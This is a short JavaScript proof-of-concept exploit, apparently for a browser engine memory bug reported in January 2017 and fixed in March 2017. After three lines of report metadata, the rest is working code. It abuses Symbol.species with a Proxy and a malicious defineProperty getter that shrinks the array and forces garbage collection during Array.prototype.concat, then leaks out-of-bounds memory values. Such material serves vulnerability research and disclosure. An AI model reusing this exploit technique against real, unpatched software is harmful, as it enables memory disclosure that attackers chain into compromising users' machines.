- Report: Jan 2017
- Fix: Mar 2017
- Credit: Brendon Tiszka
var p = new Proxy([], {});
var b_dp = Object.prototype.defineProperty;
class MyArray extends Array {
static get [Symbol.species]() {
return function() { return p; }
}; // custom constructor which returns a proxy object
}
var w = new MyArray(100);
w[1] = 0.1;
w[2] = 0.1;
function gc() {
for (var i = 0; i < 0x100000; ++i) {
var a = new String();
}
}
function evil_callback() {
w.length = 1; // shorten the array so the backstore pointer is relocated
gc(); // force gc to move the array's elements backstore
return b_dp;
}
Object.prototype.__defineGetter__("defineProperty", evil_callback);
var c = Array.prototype.concat.call(w);
for (var i = 0; i < 20; i++) { // however many values you want to leak
console.log(c[i]);
}